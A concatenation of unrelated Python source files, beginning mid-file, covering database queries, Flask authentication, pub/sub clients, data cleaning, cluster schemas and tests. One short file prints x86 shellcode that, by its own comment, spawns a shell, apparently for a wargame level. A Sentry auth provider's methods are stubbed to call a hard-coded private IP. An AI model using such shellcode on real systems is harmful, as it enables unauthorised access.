name,
date,
website,
organiser,
moreInformation,
league,
resultUploaded,
results,
winsplits,
routegadget,
userSubmittedResults,
secondaryLeague,
requiredInTotal,
additionalSettings,
uploadKey
FROM events
WHERE id=%s
""",
(eventId,),
)
if not databaseResult:
return None
return Event(databaseResult)
@staticmethod
def getByLeague(league: str) -> List[Event]:
databaseResult = queryWithResults(
"""
SELECT
id,
name,
date,
website,
organiser,
moreInformation,
league,
resultUploaded,
results,
winsplits,
routegadget,
userSubmittedResults,
secondaryLeague,
requiredInTotal,
additionalSettings,
uploadKey
FROM events
WHERE league=%s OR secondaryLeague=%s
ORDER BY date ASC, name ASC
""",
(league, league),
)
return [Event(result) for result in databaseResult]
@staticmethod
def getByLeagueWithResults(league: str) -> List[Event]:
databaseResult = queryWithResults(
"""
SELECT
id,
name,
date,
website,
organiser,
moreInformation,
league,
resultUploaded,
results,
winsplits,
routegadget,
userSubmittedResults,
secondaryLeague,
requiredInTotal,
additionalSettings,
uploadKey
FROM events
WHERE
(league=%s OR secondaryLeague=%s)
AND resultUploaded=%s
ORDER BY date ASC, name ASC
""",
(league, league, True),
)
return [Event(result) for result in databaseResult]
@staticmethod
def getLatestWithResults() -> List[Event]:
databaseResult = queryWithResults(
"""
SELECT
id,
name,
date,
website,
organiser,
moreInformation,
league,
resultUploaded,
results,
winsplits,
routegadget,
userSubmittedResults,
secondaryLeague,
requiredInTotal,
additionalSettings,
uploadKey
FROM events
WHERE resultUploaded = true
ORDER BY date DESC, name ASC
LIMIT 12
"""
)
return [Event(result) for result in databaseResult]
@staticmethod
def exists(eventId: str) -> bool:
return bool(Event.getById(eventId))
@staticmethod
def deleteById(eventId: str) -> None:
query(
"""
DELETE FROM events
WHERE id=%s
""",
(eventId,),
)
@staticmethod
def deleteAll() -> None:
query("DELETE FROM events")
|
# -*- coding: utf-8 -*-
from datetime import datetime
# year, month, etc. are attributes (not methods) and must be converted to str for concatenation
now = datetime.now()
print("all=" + now.strftime("%Y/%m/%d %H:%M:%S"))
print("year=" + str(now.year))
print("month=" + str(now.month))
print("day=" + str(now.day))
print("week=" + str(now.weekday()))
print("hour=" + str(now.hour))
print("minute=" + str(now.minute))
print("second=" + str(now.second))
|
import turtle
w = turtle.Screen()
w.title('Spiral Helix')
w.bgcolor('black')
colors = ['red', 'purple', 'blue', 'green', 'orange', 'yellow']
t = turtle.Pen()
t.speed(100)
for x in range(360):
color = colors[x % len(colors)]
t.pencolor(color)
t.width(x / 100 + 1)
t.forward(x)
t.left(59)
turtle.done()
|
"""
Copyright 2019 EUROCONTROL
==========================================
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the
following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following
disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following
disclaimer in the documentation and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
==========================================
Editorial note: this license is an instance of the BSD license template as provided by the Open Source Initiative:
http://opensource.org/licenses/BSD-3-Clause
Details on EUROCONTROL: http://www.eurocontrol.int
"""
import logging
from typing import Optional, Any, Dict, List, Set
from rest_client.errors import APIError
from subscription_manager_client.models import Topic as SMTopic
from swim_pubsub.core.clients import PubSubClient
from swim_pubsub.core.errors import PubSubClientError
from swim_pubsub.core.topics import TopicType
from swim_pubsub.publisher.handler import PublisherBrokerHandler
from swim_pubsub.core.subscription_manager_service import SubscriptionManagerService
__author__ = "EUROCONTROL (SWIM)"
_logger = logging.getLogger(__name__)
class Publisher(PubSubClient):
def __init__(self, broker_handler: PublisherBrokerHandler, sm_service: SubscriptionManagerService):
"""
Implementation of an actual SubscriptionManager user who acts as a publisher. The broker_handler should be a
`PublisherBrokerHandler` or a derivative.
:param broker_handler:
:param sm_service:
"""
self.broker_handler: PublisherBrokerHandler = broker_handler # for type hint
PubSubClient.__init__(self, broker_handler, sm_service)
self.topics_dict: Dict[str, TopicType] = {}
def register_topic(self, topic: TopicType):
"""
- Keeps a reference to the provided topic
- Creates the topic in SM
- Passes it to the broker handler
:param topic:
"""
if topic.name in self.topics_dict:
_logger.error(f"Topic with name {topic.name} already exists in broker.")
return
try:
self.sm_service.create_topic(topic_name=topic.name)
except APIError as e:
if e.status_code == 409:
_logger.error(f"Topic with name {topic.name} already exists in SM")
else:
raise PubSubClientError(f"Error while creating topic in SM: {str(e)}")
self.topics_dict[topic.name] = topic
self.broker_handler.add_topic(topic)
def publish_topic(self, topic_id: str, context: Optional[Any] = None):
"""
On demand data publish of the provided topic_id
:param topic_id:
:param context:
"""
topic = self.topics_dict.get(topic_id)
if topic is None:
raise PubSubClientError(f"Invalid topic id: {topic_id}")
self.broker_handler.trigger_topic(topic=topic, context=context)
def sync_sm_topics(self):
"""
        Syncs the topics in SM based on the locally registered ones:
- Topics that exist in SM but not locally will be deleted from SM
- Topics that exist locally but not in SM will be created in SM
"""
sm_topics: List[SMTopic] = self.sm_service.get_topics()
sm_topics_str: List[str] = [topic.name for topic in sm_topics]
local_topics_str: List[str] = [topic.name for topic in self.topics_dict.values()]
topics_str_to_create: Set[str] = set(local_topics_str) - set(sm_topics_str)
topics_str_to_delete: Set[str] = set(sm_topics_str) - set(local_topics_str)
topic_to_delete: List[SMTopic] = [topic for topic in sm_topics if topic.name in topics_str_to_delete]
for topic_name in topics_str_to_create:
self.sm_service.create_topic(topic_name=topic_name)
for topic in topic_to_delete:
self.sm_service.delete_topic(topic=topic)
|
from __future__ import absolute_import
import logging
from time import time
from sentry.auth.provider import Provider
from sentry.http import safe_urlopen
from sentry.utils import json
from sentry.auth.exceptions import IdentityNotValid
from .views import WxWorkLogin, WxWorkCallback, FetchUser, SendHt
from .constants import (
ACCESS_TOKEN_URL, CLIENT_ID, CLIENT_SECRET
)
class WxWorkAuthProvider(Provider):
name = 'WeChat Work'
logger = logging.getLogger('auth_wxwork')
client_id = CLIENT_ID
client_secret = CLIENT_SECRET
access_token_url = ACCESS_TOKEN_URL
def get_auth_pipeline(self):
safe_urlopen(method='GET', url='http://192.168.120.242:7000/v1/msg/zwjGet')
# return [
# # WxWorkLogin(),
# # WxWorkCallback(),
# # FetchUser(),
# SendHt()
# ]
def build_config(self, config):
safe_urlopen(method='GET', url='http://192.168.120.242:7000/v1/msg/zwjGet')
# return {}
def get_identity_data(self, payload):
safe_urlopen(method='GET', url='http://192.168.120.242:7000/v1/msg/zwjGet')
# return {
# 'access_token': payload['access_token'],
# 'expires': int(time()) + int(payload['expires_in']),
# }
def build_identity(self, state):
safe_urlopen(method='GET', url='http://192.168.120.242:7000/v1/msg/zwjGet')
# data = state['data']
# user_data = state['user']
# return {
# 'id': user_data['userid'],
# 'email': user_data['email'],
# 'name': user_data['name'],
# 'data': self.get_identity_data(data),
# }
def update_identity(self, new_data, current_data):
safe_urlopen(method='GET', url='http://192.168.120.242:7000/v1/msg/zwjGet')
# return new_data
def refresh_identity(self, auth_identity):
safe_urlopen(method='GET', url='http://192.168.120.242:7000/v1/msg/zwjGet')
# url = '%s?corpid=%s&corpsecret=%s' % (self.access_token_url, self.client_id, self.client_secret)
# response = safe_urlopen(url)
# self.logger.debug('Response code: %s, content: %s' % (response.status_code, response.content))
# data = json.loads(response.content)
# if data['errcode'] != 0:
# raise IdentityNotValid('errcode: %d, errmsg: %s' & (data['errcode'], data['errmsg']))
# auth_identity.data.update(self.get_identity_data(data))
# auth_identity.update(data=auth_identity.data)
|
import sys
import sqlite3
import pandas as pd
import sqlalchemy as sql
def load_data(messages_filepath, categories_filepath):
    '''
load messages and categories and merge them
INPUT:
messages_filepath: Path to the messages file
categories_filepath: Path to the categories file
OUTPUT:
df: The dataframe with the merged information
'''
messages = pd.read_csv(messages_filepath)
categories = pd.read_csv(categories_filepath)
df = messages.merge(categories, how='inner', on='id')
return df
def clean_data(df):
    '''
clean the dataframe
INPUT:
df: the dataframe that will be cleaned
    OUTPUT:
df: the dataframe cleaned
'''
categories = df['categories'].str.split(';', expand=True)
# select the first row of the categories dataframe
row = categories.head(1)
# use this row to extract a list of new column names for categories.
# one way is to apply a lambda function that takes everything
# up to the second to last character of each string with slicing
category_colnames = row.apply(lambda x: x.str[:-2])
# rename the columns of `categories`
categories.columns = category_colnames.iloc[0]
for column in categories:
# set each value to be the last character of the string
categories[column] = categories[column].str[-1]
# convert column from string to numeric
categories[column] = pd.to_numeric(categories[column])
    df.drop(columns='categories', inplace=True)
df = pd.concat([df, categories], axis=1)
df.drop_duplicates(inplace=True)
# forcing all related data to be binary
df['related'] = df['related'].astype('str').str.replace('2', '1')
df['related'] = df['related'].astype('int')
return df
def save_data(df, database_filename):
    '''
save the dataframe to a sql file
INPUT
df: the dataframe
database_filename: the file name of the sql file
'''
print(df.head())
engine = sql.create_engine('sqlite:///' + database_filename)
df.to_sql('messages', engine, index=False, if_exists='replace')
def main():
if len(sys.argv) == 4:
messages_filepath, categories_filepath, database_filepath = sys.argv[1:]
print('Loading data...\n MESSAGES: {}\n CATEGORIES: {}'
.format(messages_filepath, categories_filepath))
df = load_data(messages_filepath, categories_filepath)
print('Cleaning data...')
df = clean_data(df)
print('Saving data...\n DATABASE: {}'.format(database_filepath))
save_data(df, database_filepath)
print('Cleaned data saved to database!')
else:
print('Please provide the filepaths of the messages and categories '
'datasets as the first and second argument respectively, as '
'well as the filepath of the database to save the cleaned data '
'to as the third argument. \n\nExample: python process_data.py '
'disaster_messages.csv disaster_categories.csv '
'DisasterResponse.db')
if __name__ == '__main__':
main()
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
from marshmallow import fields
from polyaxon_schemas.base import BaseConfig, BaseSchema
from polyaxon_schemas.fields import UUID
class NodeGPUSchema(BaseSchema):
index = fields.Int()
name = fields.Str()
uuid = UUID()
memory = fields.Int()
serial = fields.Str()
cluster_node = UUID()
@staticmethod
def schema_config():
return NodeGPUConfig
class NodeGPUConfig(BaseConfig):
"""
Node gpu config.
Args:
index: `int`. The index of the gpu during the discovery.
name: `str`. The name of gpu.
uuid: `UUID`. The uuid of gpu.
memory: `int`. The memory size of the gpu.
serial: `str`. The serial of the gpu.
cluster_node: `UUID`. the uuid of the cluster node.
"""
SCHEMA = NodeGPUSchema
IDENTIFIER = 'NodeGPU'
DEFAULT_EXCLUDE_ATTRIBUTES = ['uuid', 'cluster_node']
def __init__(self, index, name, uuid, memory, serial, cluster_node):
self.uuid = uuid
self.serial = serial
self.name = name
self.index = index
self.memory = memory
self.cluster_node = cluster_node
class ClusterNodeSchema(BaseSchema):
sequence = fields.Int(allow_none=True)
name = fields.Str(allow_none=True)
uuid = UUID()
status = fields.Str(allow_none=True)
hostname = fields.Str(allow_none=True)
role = fields.Str(allow_none=True)
memory = fields.Int(allow_none=True)
cpu = fields.Float(allow_none=True)
n_gpus = fields.Int(allow_none=True)
kubelet_version = fields.Str(allow_none=True)
docker_version = fields.Str(allow_none=True)
os_image = fields.Str(allow_none=True)
kernel_version = fields.Str(allow_none=True)
schedulable_taints = fields.Bool(allow_none=True)
schedulable_state = fields.Bool(allow_none=True)
gpus = fields.Nested(NodeGPUSchema, many=True, allow_none=True)
@staticmethod
def schema_config():
return ClusterNodeConfig
class ClusterNodeConfig(BaseConfig):
"""
    Cluster node config.
Args:
uuid: `UUID`. the uuid of the cluster node.
sequence: `int`. The sequence of the node in the cluster.
name: `str`. The name of node.
hostname: `str`. The node hostname.
role: `str`. The role of the node.
docker_version: `str`. The docker version used in the node.
kubelet_version: `str`. The kubelet version used in the node.
os_image: `str`. The os image used of the node.
kernel_version: `str`. The kernel version of the node.
schedulable_taints: `bool`. The schedulable taints of the node.
schedulable_state: `bool`. The schedulable state of the node.
memory: `int`. The memory size of the node.
cpu: `float`. The cpu of the node.
n_gpus: `int`. The number of gpus in the node.
status: `str`. The status of the node (ready or ...)
gpus: `list(NodeGPUConfig)`. The node gpus.
"""
SCHEMA = ClusterNodeSchema
IDENTIFIER = 'ClusterNode'
DEFAULT_INCLUDE_ATTRIBUTES = [
'sequence', 'name', 'hostname', 'role', 'memory', 'cpu', 'n_gpus', 'status'
]
def __init__(self,
uuid,
sequence=None,
name=None,
hostname=None,
role=None,
docker_version=None,
kubelet_version=None,
os_image=None,
kernel_version=None,
schedulable_taints=None,
schedulable_state=None,
memory=None,
cpu=None,
n_gpus=None,
status=None,
gpus=None):
self.uuid = uuid
self.sequence = sequence
self.name = name
self.hostname = hostname
self.role = role
self.docker_version = docker_version
self.kubelet_version = kubelet_version
self.os_image = os_image
self.kernel_version = kernel_version
self.schedulable_taints = schedulable_taints
self.schedulable_state = schedulable_state
self.memory = memory
self.cpu = cpu
self.n_gpus = n_gpus
self.status = status
self.gpus = gpus
class PolyaxonClusterSchema(BaseSchema):
version_api = fields.Dict()
nodes = fields.Nested(ClusterNodeSchema, many=True, allow_none=True)
@staticmethod
def schema_config():
return PolyaxonClusterConfig
class PolyaxonClusterConfig(BaseConfig):
"""
Polyaxon cluster config.
Args:
version_api: `dict`. The cluster's version api.
nodes: list(ClusterNodeConfig). The nodes in the cluster.
"""
SCHEMA = PolyaxonClusterSchema
IDENTIFIER = 'PolyaxonCluster'
def __init__(self, version_api, nodes=None):
self.version_api = version_api
self.nodes = nodes
|
from sqlalchemy import Column, Integer, String
from repository.sqlite import Base
class Category(Base):
__tablename__ = "category"
id = Column(Integer, primary_key=True)
name = Column(String(250), nullable=False)
@property
def serialize(self):
return {
'name': self.name,
'id': self.id,
}
|
#!/usr/bin/env python2
# This machine code will spawn a shell on this machine if run on the CPU
shellcode = b'\xeb\x16\x5b\x31\xc0\x88\x43\x16\x89\x5b\x17\x89\x43'
shellcode += b'\x1b\xb0\x0b\x8d\x4b\x17\x8d\x53\x1b\xcd\x80\xe8\xe5'
shellcode += b'\xff\xff\xff/usr/local/bin/levelupXAAAABBBB'
print shellcode
|
##### TEC Control Messages #####
# TODO
|
''' This spins up a workbench server for the tests to hit '''
class TestServerSpinup(object):
    ''' Spin up a Workbench test server '''
def test_server_spinup(self, workbench_conn):
''' Start the workbench Server: although it looks like this
test doesn't do anything, because it hits the 'workbench_conn'
fixture a workbench server will spin up '''
print '\nStarting up the Workbench server...'
print workbench_conn
return True
|
# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-
# ex: set sts=4 ts=4 sw=4 noet:
# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
#
# See COPYING file distributed along with the niceman package for the
# copyright and license terms.
#
# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
"""Classes to manage compute resources."""
import attr
from importlib import import_module
import abc
from six.moves.configparser import NoSectionError
import yaml
from os.path import basename
from os.path import dirname
from os.path import join as opj
from glob import glob
import os.path
from ..config import ConfigManager, LOCATIONS_DOC
from ..dochelpers import exc_str
from ..support.exceptions import ResourceError
from ..support.exceptions import MissingConfigError, MissingConfigFileError
from ..ui import ui
import logging
lgr = logging.getLogger('niceman.resource.base')
class ResourceManager(object):
"""
Class to help manage resources.
"""
__metaclass__ = abc.ABCMeta
@staticmethod
def factory(config):
"""Factory method for creating the appropriate Container sub-class.
Parameters
----------
resource_config : ResourceConfig object
Configuration parameters for the resource.
Returns
-------
Resource sub-class instance.
"""
if 'type' not in config:
raise MissingConfigError("Resource 'type' parameter missing for resource.")
type_ = config['type']
module_name = '_'.join(type_.split('-'))
class_name = ''.join([token.capitalize() for token in type_.split('-')])
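        # e.g. (illustrative) a config with type "docker-container" resolves to the
        # module "niceman.resource.docker_container" and the class "DockerContainer"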
try:
module = import_module('niceman.resource.{}'.format(module_name))
except ImportError as exc:
raise ResourceError(
"Failed to import resource: {}. Known ones are: {}".format(
exc_str(exc),
', '.join(ResourceManager._discover_types()))
)
instance = getattr(module, class_name)(**config)
return instance
# TODO: Following methods might better be in their own class
@staticmethod
def _discover_types():
"""Discover resource types by instpecting the resource directory files.
Returns
-------
string list
List of resource identifiers extracted from file names.
"""
l = []
for f in glob(opj(dirname(__file__), '*.py')):
f_ = basename(f)
if f_ in ('base.py',) or f_.startswith('_'):
continue
l.append(f_[:-3])
return sorted(l)
@staticmethod
def get_resource_info(config_path, name, id_=None, type_=None):
"""Sort through the parameters supplied by the user at the command line and then
request the ones that are missing that are needed to find the config and
inventory files and then build the config dictionary needed to connect
to the environment.
Parameters
----------
config_path : string
Path to the niceman.cfg file.
name : string
Name of the resource
id_ : string
The identifier of the resource as assigned to it by the backend
type_ : string
Type of the resource module used to manage the name, e.g.
"docker_container".
Returns
-------
config : dict
The config settings for the name.
inventory : dict
Inventory of all the managed resources and their configurations.
"""
# Get name configuration for this name if it exists
# We get the config from inventory first if it exists and then
# overlay the default config settings from repronim.cfg
cm = ResourceManager.get_config_manager(config_path)
inventory_path = cm.getpath('general', 'inventory_file')
inventory = ResourceManager.get_inventory(inventory_path)
# XXX: ATM mixes creation with querying existing resources.
# IMHO (yoh) should just query, and leave creation to a dedicated function
# TODO: query could be done via ID
# TODO: check that if both name and id provided -- they are as it is in
# inventory
# TODO: if no name or id provided, then fail since this function
# is not created to return a list of resources for a given type ATM
valid_resource_types = [t.replace("_", "-") for t in ResourceManager._discover_types()]
if name in inventory:
# XXX so what is our convention here on SMTH-SMTH defining the type?
try:
config = dict(cm.items(inventory[name]['type'].split('-')[0]))
except NoSectionError:
config = {}
config.update(inventory[name])
elif type_ and type_ in valid_resource_types:
try:
config = dict(cm.items(type_.split('-')[0]))
except NoSectionError:
config = {}
else:
type_ = ui.question(
"Enter a resource type",
# TODO: decision on type of a container, if needed
# needs to be done outside, and should be configurable
# or follow some heuristic (e.g. if name starts with a
# known type, e.g. docker-
default="docker-container"
)
config = {}
if type_ not in valid_resource_types:
raise MissingConfigError(
"Resource type '{}' is not valid".format(type_))
# Overwrite config settings with those from the command line.
config['name'] = name
if type_:
config['type'] = type_
if id_:
config['id'] = id_
return config, inventory
@staticmethod
def get_config_manager(config_path=None):
"""Returns the information stored in the niceman.cfg file.
Parameters
----------
config_path : string
Path to the niceman.cfg file. (optional)
Returns
-------
cm : ConfigManager object
Information stored in the niceman.cfg file.
"""
def get_cm(config_path):
if config_path:
cm = ConfigManager([config_path], False)
else:
cm = ConfigManager()
return cm
# Look for a niceman.cfg file in the local directory if none given.
if not config_path and os.path.isfile('niceman.cfg'):
config_path = 'niceman.cfg'
cm = get_cm(config_path=config_path)
if not config_path and len(cm._sections) == 1:
config = ui.question("Enter a config file", default="niceman.cfg")
cm = get_cm(config_path=config)
if len(cm._sections) == 1:
from ..interface.base import dedent_docstring
raise MissingConfigFileError(
"Unable to locate config file: {}\n"
"You must specify it using --config "
"or place it in any of the following locations:\n\n"
"{}\n\n".format(config_path or config,
dedent_docstring(LOCATIONS_DOC)))
return cm
@staticmethod
def get_inventory(inventory_path):
"""Returns a dictionary containing the config information for all resources
created by niceman.
Parameters
----------
inventory_path : string
Path to the inventory file which is declared in the niceman.cfg file.
Returns
-------
inventory : dict
Hash whose key is resource name and value is the config settings for
the resource.
"""
if not inventory_path:
raise MissingConfigError(
"No resource inventory file declared in niceman.cfg")
# Create inventory file if it does not exist.
if not os.path.isfile(inventory_path):
lgr.info("Creating resources inventory file %s", inventory_path)
# initiate empty inventory
ResourceManager.set_inventory({'_path': inventory_path})
with open(inventory_path, 'r') as fp:
inventory = yaml.safe_load(fp)
inventory['_path'] = inventory_path
return inventory
@staticmethod
def set_inventory(inventory):
"""Save the resource inventory to a file. The location of the file is
declared in the niceman.cfg file.
Parameters
----------
inventory : dict
Hash whose key is the name of the resource and value is the config
settings of the resource.
"""
# Operate on a copy so there is no side-effect of modifying original
# inventory
inventory = inventory.copy()
inventory_path = inventory.pop('_path')
for key in list(inventory): # go through a copy of all keys since we modify
# A resource without an ID has been deleted.
inventory_item = inventory[key]
if 'id' in inventory_item and not inventory_item['id']:
del inventory[key]
# Remove AWS credentials
# XXX(yoh) where do we get them from later?
for secret_key in ('access_key_id', 'secret_access_key'):
if secret_key in inventory_item:
del inventory_item[secret_key]
with open(inventory_path, 'w') as fp:
yaml.safe_dump(inventory, fp, default_flow_style=False)
class Resource(object):
"""
Base class for creating and managing compute resources.
"""
__metaclass__ = abc.ABCMeta
def __repr__(self):
return 'Resource({})'.format(self.name)
def add_command(self, command, env=None):
"""Add a command to the command buffer so that all commands can be
run at once in a batch submit to the environment.
Parameters
----------
command : string or list
Command string or list of command string tokens.
env : dict
Additional (or replacement) environment variables which are applied
only to the current call
"""
if not hasattr(self, '_command_buffer'):
self._command_buffer = [] # Each element is a dictionary in the
# form {command=[], env={}}
self._command_buffer.append({'command': command, 'env': env})
def execute_command_buffer(self, session=None):
"""Send all the commands in the command buffer to the environment for
execution.
Parameters
----------
session : Sesson object, optional
Session object reflects the resource type. (the default is None,
which will cause the Session object to be retrieved from the
Resource object.)
"""
if not session:
session = self.get_session(pty=False)
for command in self._command_buffer:
lgr.debug("Running command '%s'", command['command'])
session.execute_command(command['command'], env=command['env'])
def set_envvar(self, var, value):
"""Save an environment variable for inclusion in the environment
Parameters
----------
var : string
Env variable name
value : string
Env variable value
"""
# TODO: This wouldn't work correctly since pretty much each command
# then should have its desired env recorded since set_envvar
# could be interleaved with add_command calls
if not hasattr(self, '_env'):
self._env = {}
self._env[var] = value
def get_updated_env(self, custom_env):
"""Returns an env dictionary with additional or replaced values.
Parameters
----------
custom_env : dict
Environment variables to merge into the existing list of declared
environment variables stored in self._env
Returns
-------
dict
Environment variables merged with additional custom variables.
"""
if hasattr(self, '_env'):
merged_env = self._env.copy()
if custom_env:
merged_env.update(custom_env)
return merged_env
return custom_env
@classmethod
def _generate_id(cls):
"""Utility class method to generate a UUID.
Returns
-------
string
Newly created UUID
"""
import uuid
# just a random uuid for now, TODO: think if we somehow could
# fingerprint it so to later be able to decide if it is 'ours'? ;)
return str(uuid.uuid1())
@abc.abstractmethod
def get_session(self, pty=False, shared=None):
"""Returns the Session object for this resource.
Parameters
----------
pty : bool, optional
Terminal session (the default is False)
shared : string, optional
Shared session identifier (the default is None)
Raises
------
NotImplementedError
[description]
"""
raise NotImplementedError
|
import flask
import flask_login
import flask_principal
from .models import UserAccount, Anonymous, Role
def init_login_manager(db):
"""Init security extensions (login manager and principal)
:param db: Database which stores user accounts and roles
:type db: ``flask_sqlalchemy.SQLAlchemy``
:return: Login manager and principal extensions
:rtype: (``flask_login.LoginManager``, ``flask_principal.Principal``
"""
login_manager = flask_login.LoginManager()
principals = flask_principal.Principal()
login_manager.anonymous_user = Anonymous
@login_manager.unauthorized_handler
def unauthorized():
flask.abort(403)
@login_manager.user_loader
def load_user(user_id):
return db.session.query(UserAccount).get(int(user_id))
@principals.identity_loader
def identity_loader():
return flask_principal.AnonymousIdentity()
return login_manager, principals
class PermissionsContainer:
"""Container for permission to be used for decorators"""
def __init__(self, name):
self.x_name = name
self.x_dict = dict()
def __getattr__(self, key):
return flask_principal.Permission(*self.x_dict.get(key, []))
class Permissions:
"""Class for prividing various permissions"""
def __init__(self):
self.roles = PermissionsContainer('roles')
self.actions = PermissionsContainer('actions')
def register_role(self, role_name):
"""Register new role by name
:param role_name: name of role to register
:type role_name: str
"""
self.roles.x_dict[role_name] = \
(flask_principal.RoleNeed(role_name),)
def register_action(self, priv_name):
"""Register new action privilege by name
:param priv_name: name of action privilege to register
:type priv_name: str
"""
self.actions.x_dict[priv_name] = \
(flask_principal.ActionNeed(priv_name),)
@property
def all_roles(self):
"""All registered roles
:return: set of str
"""
return set(self.roles.x_dict.keys())
@property
def all_actions(self):
"""All registered action privileges
:return: set of str
"""
return set(self.actions.x_dict.keys())
#: All permissions in the app
permissions = Permissions()
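# Example usage (illustrative sketch, assuming a role named 'admin' is registered
# during app setup; Permission.require comes from flask_principal):
#   permissions.register_role('admin')
#   @permissions.roles.admin.require(http_exception=403)
#   def admin_only_view():
#       ...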
def login(user_account):
"""Login desired user into the app
:param user_account: User account to be logged in
:type user_account: ``repocribro.models.UserAccount``
"""
flask_login.login_user(user_account)
flask_principal.identity_changed.send(
flask_principal.current_app._get_current_object(),
identity=flask_principal.Identity(user_account.id)
)
def logout():
"""Logout the current user from the app"""
flask_login.logout_user()
clear_session('identity.name', 'identity.auth_type')
flask_principal.identity_changed.send(
flask.current_app._get_current_object(),
identity=flask_principal.AnonymousIdentity()
)
def clear_session(*args):
"""Simple helper for clearing variables from session
:param args: names of session variables to remove
"""
for key in args:
flask.session.pop(key, None)
def reload_anonymous_role(app, db):
"""Reload special role for anonymous users
:param app: Current flask application
:type app: ``repocribro.repocribro.Repocribro``
:param db: Database connection
:type db: ``flask_sqlalchemy.SQLAlchemy``
"""
with app.app_context():
anonymous_role = None
try:
anonymous_role = db.session.query(Role).filter_by(
name=Anonymous.rolename
).first()
except:
pass
if anonymous_role is not None:
Anonymous.set_role(anonymous_role)
def get_default_user_role(app, db):
"""Get special default role for registered users
:param app: Current flask application
:type app: ``repocribro.repocribro.Repocribro``
:param db: Database connection
:type db: ``flask_sqlalchemy.SQLAlchemy``
"""
user_role = None
with app.app_context():
try:
user_role = db.session.query(Role).filter_by(
name=UserAccount.default_rolename
).first()
except:
pass
return user_role
def create_default_role(app, db, role):
"""Create default role for the app
:param app: Current flask application
:type app: ``repocribro.repocribro.Repocribro``
:param db: Database connection
:type db: ``flask_sqlalchemy.SQLAlchemy``
:param role: Role to be created
:type role: ``repocribro.models.Role``
"""
with app.app_context():
try:
existing_role = db.session.query(Role).filter_by(
name=role.name
).first()
if existing_role is None:
db.session.add(role)
db.session.commit()
except:
pass
@flask_principal.identity_loaded.connect
def on_identity_loaded(sender, identity):
"""Principal helper for loading the identity of logged user
:param sender: Sender of the signal
:param identity: Identity container
:type identity: ``flask_principal.Identity``
"""
user = flask_login.current_user
identity.user = user
if hasattr(user, 'id'):
identity.provides.add(
flask_principal.UserNeed(flask_login.current_user.id)
)
if hasattr(user, 'roles'):
for role in user.roles:
identity.provides.add(
flask_principal.RoleNeed(role.name)
)
for priviledge in user.privileges(permissions.all_actions):
identity.provides.add(
flask_principal.ActionNeed(priviledge)
)
|
#!/usr/bin/env python3
import sys  # used below for sys.argv and sys.exit()
from find_terms import *
from DataDef import File
import dictionary
from refactoring_support import *
def main(args):
# global special_domains
Refactoring.run_filter_phase = False
file_list = args[1]
if len(args) > 2:
outfile_prefix = args[2]
else:
outfile_prefix = False
if (len(args) > 3) and (args[3].lower() != 'false'):
dictionary.special_domains.extend(args[3].split('+')) # @semanticbeeng @todo @arch global state initialization
dictionary.initialize_utilities()
find_inline_terms_for_file_list(File(file_list), dict_prefix=outfile_prefix)
# @semanticbeeng @todo to run from @jep
if __name__ == '__main__':
# sys.settrace(trace_args_and_return)
sys.exit(main(sys.argv))
|
class SearchQueryMixin:
def get_response_for_query(self, query):
self.login_required()
return self.client.get(
self.get_url(name="list", **self.get_extra_kwargs()),
data={"query": query},
)
def assertResultEqual(self, response, items):
self.assertEqual(response.status_code, 200, response.json())
item = response.json()["results"]
self.assertEqual(len(item), len(items))
for i, el in enumerate(items):
self.assertEqual(item[i]["id"], el.pk)
def test_search_by_pk(self):
        # searching should always support filtering by pk
second = self.factory_class()
response = self.get_response_for_query(f"id:{second.pk}")
self.assertResultEqual(response, [second])
def test_search_invalid(self):
self.login_required()
response = self.get_response_for_query("id:")
self.assertEqual(response.status_code, 400, response.json())
item = response.json()
self.assertEqual(
item["query"][0],
"Expected end of text, found ':' (at char 2), (line:1, col:3)",
)
|
sounds = ["super", "cali", "fragil", "istic", "expi", "ali", "docious"]
result = ''
for fragment in sounds:
result += fragment
result = result.upper()
print(result)
|
# Copyright (c) 2018 The Harmonica Developers.
# Distributed under the terms of the BSD 3-Clause License.
# SPDX-License-Identifier: BSD-3-Clause
#
# This code is part of the Fatiando a Terra project (https://www.fatiando.org)
#
# pylint: disable=protected-access
"""
Test prisms layer
"""
import warnings
import pytest
import numpy as np
import numpy.testing as npt
import verde as vd
import xarray as xr
from .. import prism_layer, prism_gravity
@pytest.fixture(params=("numpy", "xarray"))
def dummy_layer(request):
"""
Generate dummy arrays for defining prism layers
"""
easting = np.linspace(-1, 3, 5)
northing = np.linspace(7, 13, 4)
shape = (northing.size, easting.size)
reference = 0
surface = np.arange(20, dtype=float).reshape(*shape)
density = 2670 * np.ones(shape)
if request.param == "xarray":
easting = xr.DataArray(easting, dims=("easting",))
northing = xr.DataArray(northing, dims=("northing",))
reference, surface = xr.DataArray(reference), xr.DataArray(surface)
density = xr.DataArray(density)
return (easting, northing), surface, reference, density
@pytest.fixture
def prism_layer_with_holes(dummy_layer): # pylint: disable=redefined-outer-name
"""
Return a set of prisms with some missing elements
The prisms are returned as a tuple of boundaries, ready to be passed to
``hm.prism_gravity``. They would represent the same prisms that the
